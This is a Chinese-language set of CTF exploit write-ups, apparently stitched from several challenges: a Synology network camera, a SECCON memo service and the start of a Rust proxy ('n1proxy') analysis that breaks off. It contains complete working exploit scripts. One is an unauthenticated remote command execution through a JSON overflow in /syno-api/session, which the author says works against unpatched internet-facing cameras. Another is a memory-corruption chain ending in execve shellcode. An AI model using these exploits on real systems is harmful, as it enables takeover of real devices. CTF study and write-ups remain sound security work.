设备情况

这是一台网络摄像头,题目只开放了管理登录界面,应该是来自于前几个月 Pwn2Own 上的破解。

image-20240205161734787

折腾一天混了个三血

5cc76de70f83041d48c03a0381c5e33

利用思路

  1. 未授权接口+JSON 解析溢出,其中 buf1 和 buf2 可以控制

img

  1. 虽然可以溢出,但是难以劫持返回地址,因为栈上存在 key 和 json 两个对象在溢出被覆盖后需要传递给其他函数使用,并且最后会被析构,所以绕过和伪造比较困难。第二个难点是 json 通过 \uXXXX 嵌入不可见字符时会被 UTF8 编码导致 payload 破坏,并且默认 flags 下不支持传入 \u0000,很多地址无法使用(这一点需要通过逆向发现具体限制,不展开)。
  2. 观察发现栈上缓存的 lex_t 结构体在满足一定条件后可以劫持 lex_t->stream_t->get 这一函数指针

img

  1. 满足一些栈上变量的限制条件后,将这个指针劫持到SynoPopen函数中 popen 调用点附近的 gadget 上,实现有 8 字节可控的任意命令执行。之所以要找 popen 调用点是因为 CGI 体所在的地址空间刚好可以通过 \uXXXX 传入且不会被破坏。

img

  1. 由于请求者自定义的请求头也会被传递给 CGI,所以可以使用$ENV_NAME 的方式可以执行请求头中放置的命令,然后把 flag 写到 /www/index.html 直接读出来

img

  1. 地址随机化程度很低,exp 成功概率约为 1/5
from pwn import *
import os

context.log_level = "debug"

ip = "47.88.48.133"
port = 33803
p = remote(ip, port)
#p = remote("127.0.0.1", 8080)

def poc(cmd):
    payload =b"A"*(0xa4-8)+cmd.ljust(8, b";")+b"\u005c\u004d\u0041" + b" " + b"A"*(0x3c-32)+b"BBBB"+b",MA"
    value = b'""'
    json_data = b'{"' + payload + b'": ' + value + b'}'
    _data = json_data
    buf = b""
    buf += b"PUT /syno-api/session HTTP/1.1\r\n"
    buf += b"Accept: */*\r\n"
    buf += b"A: cp /flag /www/index.html\r\n"
    buf += b"Content-Type: application/json\r\n"
    buf += b"Content-Length: " + str(len(_data)).encode() + b"\r\n"
    buf += b"\r\n"
    buf += _data
    return buf

def exp():
    p.send(poc(b"$HTTP_A;"))
    print("Try to read flag...")
    os.system(f"curl http://{ip}:{port}/index.html")
    #p.interactive()

if __name__ == "__main__":
    exp()
  1. 目前该 EXP 可以直接攻击公网中未升级的设备,请勿用于非法用途

调试方法

  1. 如何获取设备终端?

    • 虽然模拟固件时可以得到一个 shell,但是由于模拟的问题终端会被报错信息填满,可以使用 telnetd -p 23 -l /bin/sh 开启 telnet 服务,然后在脚本上加一个 hostfw 参数映射 telnet 到主机上进行操作。
  2. 如何调试 CGI?

    • 方法1:提取 CGI 二进制文件,使用 qemu-user 进行模拟,只需要通过环境变量传递 HTTP 请求头和其它请求参数,通过 stdin 传递 POST 内容。缺点是地址空间与真实设备不符,对利用方式有影响,适合快速确定漏洞 PoC 以及进行一些 Fuzz 操作。

      from pwn import *
      import json
      import urllib
      
      context.log_level = "debug"
      
      payload = b"A"*53
      json_data = b'{"' + payload + b'": ""}'
      content_length = len(json_data)
      # elf base: 0x40000000
      # json lib: 0x3f78c000
      
      p = process(["./rootfs/qemu-arm-static", "-g", "1235", "--singlestep", "-L", "./rootfs/", "./rootfs/www/camera-cgi/synocam_param.cgi"], 
                  env={
                      "GATEWAY_INTERFACE": "CGI/1.1",
                      "CONTENT_TYPE": "application/json",
                      "ACTION_PREPARE": "yes",
                      "LOCAL_URI": "/syno-api/session",
                      "REMOTE_ADDR": "10.0.2.2",
                      "SHLVL": "1",
                      "DOCUMENT_ROOT": "/www",
                      "REMOTE_PORT": "34052",
                      "RESPONSE_TO": "SOCKET",
                      "HTTP_ACCEPT": "*/*",
                      "CONTENT_LENGTH": str(content_length),
                      "SCRIPT_FILENAME": "/www/camera-cgi/synocam_param.cgi",
                      "PATH_TRANSLATED": "/www",
                      "REQUEST_URI": "/syno-api/session",
                      "SERVER_SOFTWARE": "CivetWeb/1.15",
                      "LOCAL_URI_RAW": "/syno-api/session",
                      "PATH": "/sbin:/usr/sbin:/bin:/usr/bin",
                      "SERVER_PROTOCOL": "HTTP/1.1",
                      "HTTP_CONTENT_TYPE": "application/json",
                      "REDIRECT_STATUS": "200",
                      "REQUEST_METHOD": "PUT",
                      "PWD": "/www/camera-cgi",
                      "SERVER_ROOT": "/www",
                      "HTTPS": "off",
                      "SERVER_PORT": "80",
                      "SCRIPT_NAME": "/syno-api/session",
                      "ACTION_QUERY": "yes",
                      "SERVER_NAME": "IPCam",
                      "HTTP_CONTENT_LENGTH": str(content_length)
                  }
                  )
      p.send(json_data)
      p.shutdown('send')
      p.interactive()
    • 方法2:使用 qemu-system 的 -s 参数进行调试,在已知 CGI 地址空间时可以直接给漏洞点下断,等待触发断点,好处是和真实利用时的情况接近,缺点是操作比较麻烦,有时候会出现地址冲突问题。
  3. 如何获取 CGI 地址空间?

    • 为了下断点和知道地址劫持的目标,获取 CGI 运行时地址空间很重要,但是 CGI 只在每次请求时单独被调用,每次运行地址都在变。所以首先得关闭设备 ASLR,然后通过 patch CGI 入口使其进入循环,这时候就可以通过 proc 文件系统读出地址空间如下。

      • patch 方式:printf "\xFE\xFF\xFF\xEA" | dd of=synocam_param.cgi bs=1 seek=$((0x7BF1C)) count=4 conv=notrunc
      • 地址空间:

        00400000-004a7000 r-xp 00000000 00:02 1764       /www/camera-cgi/synocam_param_1.cgi
        004b7000-004b8000 r--p 000a7000 00:02 1764       /www/camera-cgi/synocam_param_1.cgi
        004b8000-004b9000 rw-p 000a8000 00:02 1764       /www/camera-cgi/synocam_param_1.cgi
        004b9000-004da000 rw-p 00000000 00:00 0          [heap]
        76824000-76865000 rw-p 00000000 00:00 0 
        76865000-76991000 r-xp 00000000 00:02 1669       /lib/libc-2.30.so
        76991000-769a1000 ---p 0012c000 00:02 1669       /lib/libc-2.30.so
        769a1000-769a3000 r--p 0012c000 00:02 1669       /lib/libc-2.30.so
        769a3000-769a4000 rw-p 0012e000 00:02 1669       /lib/libc-2.30.so
        769a4000-769a7000 rw-p 00000000 00:00 0 
        769a7000-769c5000 r-xp 00000000 00:02 1607       /lib/libgcc_s.so.1
        769c5000-769d4000 ---p 0001e000 00:02 1607       /lib/libgcc_s.so.1
        769d4000-769d5000 r--p 0001d000 00:02 1607       /lib/libgcc_s.so.1
        769d5000-769d6000 rw-p 0001e000 00:02 1607       /lib/libgcc_s.so.1
        769d6000-76a32000 r-xp 00000000 00:02 1728       /lib/libm-2.30.so
        76a32000-76a41000 ---p 0005c000 00:02 1728       /lib/libm-2.30.so
        76a41000-76a42000 r--p 0005b000 00:02 1728       /lib/libm-2.30.so
        76a42000-76a43000 rw-p 0005c000 00:02 1728       /lib/libm-2.30.so
        76a43000-76b39000 r-xp 00000000 00:02 848        /usr/lib/libstdc++.so.6.0.25
        76b39000-76b48000 ---p 000f6000 00:02 848        /usr/lib/libstdc++.so.6.0.25
        76b48000-76b4d000 r--p 000f5000 00:02 848        /usr/lib/libstdc++.so.6.0.25
        76b4d000-76b50000 rw-p 000fa000 00:02 848        /usr/lib/libstdc++.so.6.0.25
        76b50000-76b51000 rw-p 00000000 00:00 0 
        76b51000-76b53000 r-xp 00000000 00:02 1621       /lib/libdl-2.30.so
        76b53000-76b62000 ---p 00002000 00:02 1621       /lib/libdl-2.30.so
        76b62000-76b63000 r--p 00001000 00:02 1621       /lib/libdl-2.30.so
        76b63000-76b64000 rw-p 00002000 00:02 1621       /lib/libdl-2.30.so
        76b64000-76b84000 r-xp 00000000 00:02 1351       /lib/libz.so.1.2.13
        76b84000-76b93000 ---p 00020000 00:02 1351       /lib/libz.so.1.2.13
        76b93000-76b94000 r--p 0001f000 00:02 1351       /lib/libz.so.1.2.13
        76b94000-76b95000 rw-p 00020000 00:02 1351       /lib/libz.so.1.2.13
        76b95000-76c10000 r-xp 00000000 00:02 1725       /lib/libssl.so.1.1
        76c10000-76c1f000 ---p 0007b000 00:02 1725       /lib/libssl.so.1.1
        76c1f000-76c24000 r--p 0007a000 00:02 1725       /lib/libssl.so.1.1
        76c24000-76c28000 rw-p 0007f000 00:02 1725       /lib/libssl.so.1.1
        76c28000-76e6f000 r-xp 00000000 00:02 1753       /lib/libcrypto.so.1.1
        76e6f000-76e7f000 ---p 00247000 00:02 1753       /lib/libcrypto.so.1.1
        76e7f000-76e95000 r--p 00247000 00:02 1753       /lib/libcrypto.so.1.1
        76e95000-76e97000 rw-p 0025d000 00:02 1753       /lib/libcrypto.so.1.1
        76e97000-76e9a000 rw-p 00000000 00:00 0 
        76e9a000-76f1a000 r-xp 00000000 00:02 1608       /lib/libcurl.so.4.8.0
        76f1a000-76f2a000 ---p 00080000 00:02 1608       /lib/libcurl.so.4.8.0
        76f2a000-76f2b000 r--p 00080000 00:02 1608       /lib/libcurl.so.4.8.0
        76f2b000-76f2d000 rw-p 00081000 00:02 1608       /lib/libcurl.so.4.8.0
        76f2d000-76f2e000 rw-p 00000000 00:00 0 
        76f2e000-76f45000 r-xp 00000000 00:02 1751       /lib/libpthread-2.30.so
        76f45000-76f54000 ---p 00017000 00:02 1751       /lib/libpthread-2.30.so
        76f54000-76f55000 r--p 00016000 00:02 1751       /lib/libpthread-2.30.so
        76f55000-76f56000 rw-p 00017000 00:02 1751       /lib/libpthread-2.30.so
        76f56000-76f58000 rw-p 00000000 00:00 0 
        76f58000-76f9c000 r-xp 00000000 00:02 1595       /lib/libutil.so
        76f9c000-76fab000 ---p 00044000 00:02 1595       /lib/libutil.so
        76fab000-76fac000 r--p 00043000 00:02 1595       /lib/libutil.so
        76fac000-76fad000 rw-p 00044000 00:02 1595       /lib/libutil.so
        76fad000-76fae000 rw-p 00000000 00:00 0 
        76fae000-76fbd000 r-xp 00000000 00:02 1358       /lib/libjansson.so.4.7.0
        76fbd000-76fcc000 ---p 0000f000 00:02 1358       /lib/libjansson.so.4.7.0
        76fcc000-76fcd000 r--p 0000e000 00:02 1358       /lib/libjansson.so.4.7.0
        76fcd000-76fce000 rw-p 0000f000 00:02 1358       /lib/libjansson.so.4.7.0
        76fce000-76fee000 r-xp 00000000 00:02 1612       /lib/ld-2.30.so
        76ff5000-76ffb000 rw-p 00000000 00:00 0 
        76ffb000-76ffc000 r-xp 00000000 00:00 0          [sigpage]
        76ffc000-76ffd000 r--p 00000000 00:00 0          [vvar]
        76ffd000-76ffe000 r-xp 00000000 00:00 0          [vdso]
        76ffe000-76fff000 r--p 00020000 00:02 1612       /lib/ld-2.30.so
        76fff000-77000000 rw-p 00021000 00:02 1612       /lib/ld-2.30.so
        7efdf000-7f000000 rw-p 00000000 00:00 0          [stack]
        ffff0000-ffff1000 r-xp 00000000 00:00 0          [vectors]
  4. 如何获取 CGI 环境变量?

    • webd 调用 CGI 时只看文件名,所以可以将原来的 CGI 可执行文件替换成一个 shell 脚本打印出 webd 传递的环境变量。
  5. 如何确定未授权入口?

    • 提取两类地址—— web 根目录下所有的文件相对路径、前端 JS 中的 API 路径,使用 dirsearch 扫描排除 401 响应的接口(注意需要换不同的请求方法进行尝试)。提取未授权入口是因为漏洞位于 json 解析的库中,而不是 webd 中,需要能够找到能够解析 json 的接口来完成整个攻击链。

      • 提取的 URL 如下,其中 /syno-api/session 就是本次攻击的入口:

        [20:50:34] 200 -   29KB - /uistrings/ptb/strings
        [20:50:34] 200 -   28KB - /uistrings/nor/strings
        [20:50:34] 200 -   48KB - /uistrings/rus/strings
        [20:50:35] 200 -   29KB - /uistrings/sve/strings
        [20:50:35] 200 -   30KB - /uistrings/nld/strings
        [20:50:35] 200 -   30KB - /uistrings/krn/strings
        [20:50:35] 200 -   29KB - /uistrings/ita/strings
        [20:50:35] 200 -   30KB - /uistrings/spn/strings
        [20:50:35] 200 -   34KB - /uistrings/jpn/strings
        [20:50:35] 200 -   30KB - /uistrings/ptg/strings
        [20:50:35] 200 -   32KB - /uistrings/hun/strings
        [20:50:35] 200 -   27KB - /uistrings/enu/strings
        [20:50:35] 200 -   24KB - /uistrings/chs/strings
        [20:50:35] 200 -   28KB - /uistrings/dan/strings
        [20:50:35] 200 -   24KB - /uistrings/cht/strings
        [20:50:35] 200 -   31KB - /uistrings/ger/strings
        [20:50:35] 200 -   32KB - /uistrings/fre/strings
        [20:50:35] 200 -   30KB - /uistrings/trk/strings
        [20:50:35] 200 -   29KB - /uistrings/csy/strings
        [20:50:36] 200 -   31KB - /uistrings/plk/strings
        [20:50:36] 200 -   61KB - /uistrings/tha/strings
        [20:50:36] 200 -   32KB - /uistrings/uistrings.cgi
        [22:39:23] 200 -   15B  - /syno-api/session
        [22:39:25] 200 -    7B  - /syno-api/security/info/language
        [22:39:25] 200 -   21B  - /syno-api/security/info/mac
        [22:39:25] 200 -    4B  - /syno-api/security/info/serial_number
        [22:39:25] 200 -  105B  - /syno-api/security/info
        [22:39:25] 200 -    6B  - /syno-api/activate
        [22:39:25] 200 -    9B  - /syno-api/security/info/name
        [22:39:25] 200 -   14B  - /syno-api/maintenance/firmware/version
        [22:39:25] 200 -    6B  - /syno-api/security/network/dhcp
        [22:39:25] 200 -    9B  - /syno-api/security/info/model

0x00 漏洞点

  • 用户态在 free_space 中读写的时候,使用 f_pos 来控制读写偏移,f_pos 有 0x3FFFFFFF 最大值限制

    image-20230920182346105

    • 最开始想着 read/write 会不会有逻辑问题导致 overlap 的发生去修改 fixed_space 的 meta 区域的指针构造任意地址读写,但是看了很久代码确认其没有这样的逻辑问题
    • 使用 offset = 0x3FFFFFFF-1-0x1000, size = n 这样的组合去读 free_space 看着像是会越界,但是不知道越界所读到的是什么,最开始是直接猜测会读到内核中一些对用户态没帮助的数据,但是实际上神奇的点就在这。不过在 user mode 题所给出的代码中完全看不出来具体的漏洞原因是什么,需要通过 kernel mode 题给出的源码中找到原因,当然如果随手试一试上面的那个边界条件来读东西就会发现有点端倪的...
    • 这里唯一要注意的一个东西就是,如果 data 为 NULL(一开始没去考虑这种情况),那么这个读循环是不会终止的,循环继续下去 f_pos 也会递增从而有可能超过之前的最大值限定,产生“非预期”行为

    over_rw_reason_code_2

  • 下一步就是使用 kernel mode 的代码查看 get_memo_ro 的实现,它把传进去的 pos 按页对齐后传给了 __pgoff_to_memopage

    over_rw_reason_code_3

    • 这个函数是问题的关键。这个函数从一个二级页表结构中,取出 f_pos 所命中的页面。每一级页表都是一个 0x200 大小的指针表,只不过在初始情况下第一级页表中,只有第一项是有值的,其它都是 NULL,导致只要超出第一个页表去读写时都会返回 NULL,于是用户会读写不到任何东西(但是也不会报错)

    over_rw_reason_code_0

    over_rw_reason_code_1

    • 一级页表的最后一项和第一项

    page_level_1

    • 存在一个问题,如果 f_pos 从 0x3FFFFFFF-1 开始读写,会拿到一个空的页表项,返回空指针;然后 f_pos 继续增长,此时会超过 0x3FFFFFFF,通过计算之后,一级页表的下表会变成 0 导致产生严重的 overlap 去读写 fixed_space 的 meta 指针区域

    over_rw_reason

    • meta 指针表,其中的指针和 libc 有固定偏移,可以泄露 libc 地址;通过写指针然后用 fixed_read 可以进一步泄露出栈地址

    free_space_over_read

0x01 利用的坑

  • 看起来可以任意地址读写之后就可以为所欲为了,直接读栈地址,写 rop 到栈上就搞定了,但是有一个巨大的坑,那就是远程交互是通过 TTY 处理再输入到程序的 STDIN 中的,这个过程部分特殊字符会被 TTY 处理产生别的效果。例如写指针要用到的 \x7f 对应的控制效果是 DEL,这会导致它本身和它前一个字符在输入到 STDIN 时消失,还有其他比如 Ctrl+C 等会导致进程结束...尝试通过 \x16 等字符也没有成功 escape,花了很久时间最后决定尝试绕掉 \x7f 的坑;
  • 首先,任意地址读写的时候,由于读写的都是 libc 或者 栈地址,所以只控制 meta 指针的低 5 字节即可;
  • 由于程序本身几乎没有可用 gadget,如果写 libc 地址,又要面临 \x7f 的问题,所以不能很顺利写 ROP 到栈上;
  • 写栈上 main 函数返回地址的时候,由于需要使用 fixed_write 功能来写,不能自由控制写入的字节数量(固定为0x100),会导致终端的换行符被一并写入,覆盖掉高位,所以需要尝试把要写入的 5 字节放在 0x100 字节的末尾,不过这样就得从 target-(0x100-5) 的地方开始写,容易破坏其它东西,所以用了下面这个方法来劫持一个高位为 0x7f 的指针,同时不破坏正常数据,唯一的要求就是返回地址之后一定距离内要有一个高位为 \x7f 的指针;

    • image-20230920190922703
  • 最开始发现,在这个位置能刚好满足 one_gadget 条件,但是劫持过去才发现 busybox 环境对 argv[0] 有要求,one_gadget 不起作用;
  • 然后就开始漫长的走弯路。。。构造了好久 rtld_global。。。最后也没用;
  • 折腾了一大通才发现,用户态程序开了 栈可执行(??????),在 buff 中写 shellcode 然后用上述方法劫持指针跳过去就搞定了。。。

0x02 其它

  • 有一个没用上但是很神奇的思路,libc 地址最高字节有一定概率为 \x7e ,在这种条件下任意地址写时可以不用考虑 \x7f 的限制从而写 libc 的任意地址(但是写不了栈),而且这个题目中进退出了连接不会断,而是会回到 login 界面,给了这种爆破很大的可能性,以至于让我一度以为这个是预期解法...

0x03 EXP

from pwn import *
import os

context.log_level = "debug"
context.arch = "amd64"

#p = process("./run.sh")
p = remote("ukqmemo.seccon.games", 6318)

def free_space():
    p.sendlineafter(b"> ", b"2")
    
def free_read(offset:int, size:int):
    p.sendlineafter(b"S> ", b"1")
    p.sendlineafter(b"Offset: ", str(offset).encode())
    p.sendlineafter(b"Size: ", str(size).encode())
    
def free_write(offset:int, size:int, data):
    p.sendlineafter(b"S> ", b"2")
    p.sendlineafter(b"Offset: ", str(offset).encode())
    p.sendlineafter(b"Size: ", str(size).encode())
    p.sendlineafter(b"Input: ", data)
    
def free_back():
    p.sendlineafter(b"S> ", b"0")
    
def fixed_space():
    p.sendlineafter(b"> ", b"1")
    
def fixed_read(idx):
    p.sendlineafter(b"M> ", b"1")
    p.sendlineafter(b"Index: ", str(idx).encode())
    
def fixed_write(idx, data):
    p.sendlineafter(b"M> ", b"2")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Input: ", data)

def fixed_back():
    p.sendlineafter(b"M> ", b"0")
    
def escape(x):
    return b''.join(
        bytes([i])
        if (i>=0x20 and i!=0x7f) or i==0 else
        bytes([0x16, i])
        for i in x)
        
def write_primitive(addr, value, no_back=False):
    free_space()
    payload = b"\x00\x00" + p64(addr)[:5]
    free_write(0x3FFFFFFF-1-0x1000, len(payload), payload)
    print(f"write {value.hex()} to addr({hex(addr)})")
    fixed_space()
    fixed_write(0, value)
    if not no_back:
        fixed_back()
    
def read_primitive(addr):
    free_space()
    payload = b"\x00\x00" + p64(addr)[:5]
    free_write(0x3FFFFFFF-1-0x1000, len(payload), payload)
    fixed_space()
    fixed_read(0)
    fixed_back()
        
def check_payload(payload):
    cnt = 0
    for i in payload:
        if i in [0x3,0x4,0xa,0x11,0x13,0x14,0x15,0x18,0x19,0x1a,0x1c,0x7f]:
            print("bad char:", cnt, hex(i))
            return False
        cnt += 1
    return True
        

def exp():
    _pow = 1
    if _pow:
        p.recvuntil(b"hashcash -mb26 ")
        val = p.recvuntil(b"\n", drop=True)
        res = os.popen(f"hashcash -mb26 {val.decode()}").read()
        p.sendlineafter(b"hashcash token: \n", res.encode())
        

    p.sendlineafter(b"buildroot login: ", b"ctf")
    
    # leak mmap addr & libc addr
    free_space()
    free_read(0x3FFFFFFF-1-0x1000, 0x10)
    p.recvuntil(b"Output: \x00\x00")
    leak1 = u64(p.recv(8))
    memo_base = leak1 - 0x100
    libc_base = memo_base + 0x3000
    environ = libc_base + 0x185160
    print("leak1:", hex(leak1))
    print("memo_base:", hex(memo_base))
    print("libc_base:", hex(libc_base))
    print("environ:", hex(environ))
    
    # leak environ
    tmp = b"\x00\x00" + p64(environ)[:5]
    payload = tmp
    print("payload1:", payload.hex())
    free_write(0x3FFFFFFF-1-0x1000, len(payload), payload)
    free_space()
    free_read(0x3FFFFFFF-1-0x1000, 0x10)
    free_back()
    
    fixed_space()
    fixed_read(0)
    p.recvuntil(b"Output: ")
    stack_leak = u64(p.recv(8))
    print("stack_leak:", hex(stack_leak))
    fixed_back()
    
    # leak program base
    free_space()
    bin_leak_ptr = stack_leak+0xf0
    tmp = b"\x00\x00" + p64(bin_leak_ptr)[:5]
    payload = tmp
    print("payload2:", payload.hex())
    free_write(0x3FFFFFFF-1-0x1000, len(payload), payload)
    fixed_space()
    fixed_read(0)
    p.recvuntil(b"Output: ")
    bin_leak = u64(p.recv(8))
    bin_base = bin_leak - 0x1240
    print("bin_leak:", hex(bin_leak))
    print("bin_base:", hex(bin_base))
    fixed_back()
    
    # gadgets
    ret = bin_base + 0x1298
    one_gadget = libc_base + 0x5eb99
    # try rop
    ret_addr = stack_leak - 0x200 + 0xd8
    shellcode_addr = stack_leak - 0x580
    payload = b"\x00"*((0x100-5)%8) + p64(ret) * (0xf8//8) +p64(shellcode_addr)[:5]
    write_primitive(ret_addr+0xf8-(0x100-5), payload, True)
    shellcode = b'jhH\xb8/bin///sPH\x89\xe7hri\x01\x01\x814$\x01\x01\x01\x011\xf6Vj\x08^H\x01\xe6VH\x89\xe61\xd2j;X\x0f\x05'
    if check_payload(shellcode):
        print("good shellcode")
    else:
        print("bad shellcode")
    free_space()
    free_write(0, len(shellcode), shellcode)
    free_back()

    print("shellcode_addr:", hex(shellcode_addr))
    print("ret_gadget:", hex(ret))
    
    p.interactive()

if __name__ == "__main__":
    exp()

n1proxy

附件:https://pan.baidu.com/s/1JWEtWiyOmaJ4tzrVVXLZhA?pwd=ty6w (提取码:ty6w)

0x00 题目信息

we use safety rust to deploy a very safe proxy server!

Notice:the docker can't restart automatically for some reason, please close the docker and start a new one if you find some trouble

又是一个 Rust Pwn,比较巧的是比赛过程中获得了一血唯一解

0x01 题目分析

代码审计

  • 本题使用私有协议实现了一个支持 TCP, UDP, UNIX SOCK 三种底层协议的 proxy server,并且采用了 Rust 语言编码。源代码中多处使用 unsafe 代码块来直接调用 libc 中的函数;
  • main 函数起始处将 ptmalloc 中的 arena 数量设置为了 1,主要是为了简化在并发情况下堆利用的难度;

    • // make this easier :)
      unsafe {
          mallopt(libc::M_ARENA_MAX, 1);
      }
  • 主函数通过 handle_client 并行处理所有进入的连接;

    • thread::spawn(move || {
          println!("New client connected");
          handle_client(client_fd).unwrap_or_else(|err| {
              eprintln!("Error: {}", err);
              let err_msg = format!("error : {}", err);
              my_write(client_fd, err_msg.as_ptr() as *const c_void, err_msg.len()).ok();
          });
          unsafe { libc::close(client_fd) };
          println!("Client disconnected")
      });
  • handle_client 中主要通过 my_writemy_read 与客户端交互,并完成与客户端的密钥交换、会话密钥的协商,最后执行客户端指定的代理功能。需要注意的是,在一个会话中,只能调用一次代理功能的原语,整体的协议交互流程整理如下:

    • (handshake)
      server --> client | HELLO_MSG: "n1proxy server v0.1"
      client --> server | CLIENT_HELLO: "n1proxy client v0.1"
      client --> server | conn_type
      server --> client | key_exchange_sign, key_exchange
      client --> server | client_verify_len, client_verify
      client --> server | client_key_len, client_key_n
      client --> server | client_key_len, client_key_e
      server --> client | new_session_sign, new_session[E_cli(session_key), E_cli(time)]
      
      (new session)
      client --> server | E_sess(pre_conn[type_u32, status_u32, signature])
      server --> client | E_sess(ok_msg[ok_msg, key_exchange_sign])
      
      (connection operations)
      switch status:
      Listen:
          client --> server | E_sess(conn_data[host_len, host, port, signature])
          // new_unix_socket_listen(&target_host, target_port)
          server --> client | E_sess(resmsg[conn_fd, key_exchange_sign])
      
      Close:
          client --> server | E_sess(conn_data[fd, signature])
          // close(fd)
          server --> client | E_sess(resmsg[0, key_exchange_sign])
      
      Conn:
          client --> server | E_sess(conn_data[host_len, host, port, signature])
          // ProxyType::Tcp => my_connect(&target_host, target_port)?,
          // ProxyType::Udp => my_new_udp_connect(&target_host, target_port)?,
          // ProxyType::Sock => new_unix_socket_connect(&target_host, target_port)?,
          server --> client | E_sess(resmsg[conn_fd, key_exchange_sign])
      
      Recv:
          client --> server | E_sess(conn_data[fd, data_size_u64, signature])
          // TCP: my_read(fd, data, len);
          // ProxyType::Udp => my_recvfrom(target_fd, recv_data_size as usize)?,
          // ProxyType::Sock => my_recv_msg(target_fd, recv_data_size as usize)?,
          server --> client | E_sess(resmsg[data[recv_data_len, recv_data], key_exchange_sign])
      
      Send:
          client --> server | E_sess(conn_data[fd, data_size_u64, data, signature])
          // TCP: my_write(fd, data, len);
          // ProxyType::Udp => my_sendto(target_fd, &send_data)?,
          // ProxyType::Sock => my_send_msg(target_fd, &send_data)?,
          server --> client | E_sess(resmsg[send_res, key_exchange_sign])
    • handshake 部分会完成密钥的交换,并协商出一个 session_key,完成会话的初始化;
    • 会话建立后,new session 部分客户端先传递 typestatue 两个参数,type 用于指定代理所使用的协议类型,statue 决定使用什么功能原语;
    • connection operations 部分,按照 status 分发进入不同的原语中:

      • Listen:使用 unix:sock 在 /tmp/<hash_val> 目录下监听请求;
      • Close:关闭连接池中的指定 fd,并完成相应的资源释放;
      • Conn:指定 target_host:port 并使用 type 中指定的协议建立连接,并将 fd 加入连接池中;
      • Recv:指定连接池中的 fd 并使用 type 中指定的协议接收 data_size 大小的数据并返回;
      • Send:指定连接池中的 fd 并使用 type 中指定的协议发送 data_size 大小的数据并返回发送字节数。
  • 其它关键函数的实现请参考源代码。

漏洞点

漏洞位于指定 Recv 功能的 type 为 unix:sock 协议时所调用的 my_recv_msg 函数,但是该漏洞比较隐蔽,即使有一定 Rust 开发经验的人也会容易忽略(更何况我没有...)。

不过通过对比 my_send_msgmy_recv_msg 两个函数实现,再结合一定的分析还是能够看出端倪的:

#[inline(always)]
fn my_send_msg(fd: i32, msg: &[u8]) -> Result<isize> {
    let mut iov = vec![iovec {
        iov_base: msg.as_ptr() as *mut _,
        iov_len: msg.len(),
    }];
    let m = msghdr {
        msg_name: std::ptr::null_mut(),
        msg_namelen: 0,
        msg_iov: iov.as_mut_ptr(),
        msg_iovlen: iov.len(),
        msg_control: std::ptr::null_mut(),
        msg_controllen: 0,
        msg_flags: 0,
    };
    let send_res = unsafe { sendmsg(fd, &m, 0) };

    if send_res < 0 {
        return os_error!();
    }
    Ok(send_res)
}

#[inline(always)]
fn my_recv_msg(fd: i32, recv_size: usize) -> Result<Vec<u8>> {
    let mut recv_iov = [iovec {
        iov_base: vec![0u8; recv_size].as_mut_ptr() as *mut _,
        iov_len: recv_size,
    }];
    let mut msg = msghdr {
        msg_name: std::ptr::null_mut(),
        msg_namelen: 0,
        msg_iov: recv_iov.as_mut_ptr(),
        msg_iovlen: 1,
        msg_control: std::ptr::null_mut(),
        msg_controllen: 0,
        msg_flags: 0,
    };
    let recv_sz = unsafe { recvmsg(fd, &mut msg, 0) };
    if recv_sz < 0 {
        return os_error!();
    }

    let res = unsafe { slice::from_raw_parts(recv_iov[0].iov_base as *const u8, recv_size) };
    Ok(res.to_vec())
}
  • msghdr 是 Linux 下 sock 通信常用的一个结构体,其中较为关键的是 struct iovec * msg_iovint msg_iovlen,他们设置了待使用缓冲区的队列头和长度。而 iovec 结构体由 iov_baseiov_len 组成,前者保存的是缓冲区指针,后者保存缓冲区大小来避免越界;

    • #include<sys/socket.h>
      struct msghdr  {
          void* msg_name ;   
          socklen_t msg_namelen ;    
          struct iovec  * msg_iov ;   
          int  msg_iovlen ;   
          void  * msg_control ;  
          socklen_t msg_controllen ; 
          int  msg_flags ;  
      } ;
  • 回到这两个函数里面,my_send_msg 中, iov_base 设置的是 msg 的指针,msg 由上层函数申请并传入,其内容为客户端想要发送的数据;而 my_recv_msg 中,iov_base 通过 vec![0u8; recv_size].as_mut_ptr() as *mut _ 的方式初始化,这相当于在堆上开辟了一段 recv_size 大小的空间并转换为指针后赋值。这里有三个问题:

    • as_mut_ptr() 方法会返回 vector 第一个元素的裸指针,Rust 无法跟踪或管理裸指针的生命周期;
    • 同时,vec![0u8; recv_size] 在一个类似闭包的环境中申请,一旦出了对应的代码块就会被释放,而由于使用了裸指针来引用这块内存,并且最后所有引用 iov_base 的地方都位于 unsafe 代码块中,编译器完全无法正确追踪和检查此处的生命周期问题;
    • 最后一个问题,slice::from_raw_parts 的大小参数使用了用户指定的 recv_size,而不是 recvmsg 函数的返回值——即实际从 fd 中读出的数据大小 recv_sz。如果 recv_size 小于 recv_sziov_base 残留未初始化数据的话,这可能会导致这部分未初始化数据被当作正常读出的数据返回给客户端。
  • 所以 my_recv_msg 函数可以等价为:

    1. 使用一个 recv_size 大小的内存初始化 iov_base
    2. 释放这块内存得到悬空指针;
    3. unsafe { recvmsg(fd, &mut msg, 0) } 处从读取事先发送到指定 fd 上的数据并写入这块内存(UAF);
    4. 最后通过 unsafe { slice::from_raw_parts(recv_iov[0].iov_base as *const u8, recv_size) } 申请一个同样大小的内存,并把此时 recv_iov[0].iov_base 指针上的值拷贝到这块内存中。

0x02 利用思路

  • 因为漏洞点位于 my_recv_msg ,所以我们主要使用的功能原语是 unix:sock 协议下的 Send 和 Recv。为了使用这两个原语,还得先建立一个双工的管道。首先需要使用 Listen 功能监听一个 socket 文件,此时会话的线程会阻塞在 accept 的位置;然后在新进程中创建另一个会话调用 Conn 功能连接这个 socket 文件,此时会获得一个 fd,先前阻塞在 accept 的会话也会因为有新的连接请求而返回一个 fd。此时我们通过这两个 fd 就建立了一个双工管道,在管道的两端读写就可以分别调用 my_send_msgmy_recv_msg
  • 由上面的分析可以知道,iov_base 可以完成 UAF 的读和写,但是此时没有别的漏洞泄露地址,而在向客户端泄露值之前先要完成一次从 recvmsg 读出数据的写,此时如果不控制好写入的值会导致 crash。例如此时写入的是 tcache chunk 的 next 指针,当进行后续 malloc 操作的时候可能就会发生未知错误;
  • 奇妙的风水:由于 IDA 逆向没搞清楚到底要在哪下断点,于是就在 UAF 的前后直接查看堆的状态来风水。经过测试得到这么一个组合,当 Send 发送 8 个 \x00 ,且 Recv 接收 0x200 大小的数据时,会有较大概率泄露出一个较稳定的 libc 地址且不 crash:

    • image-20231026164134677
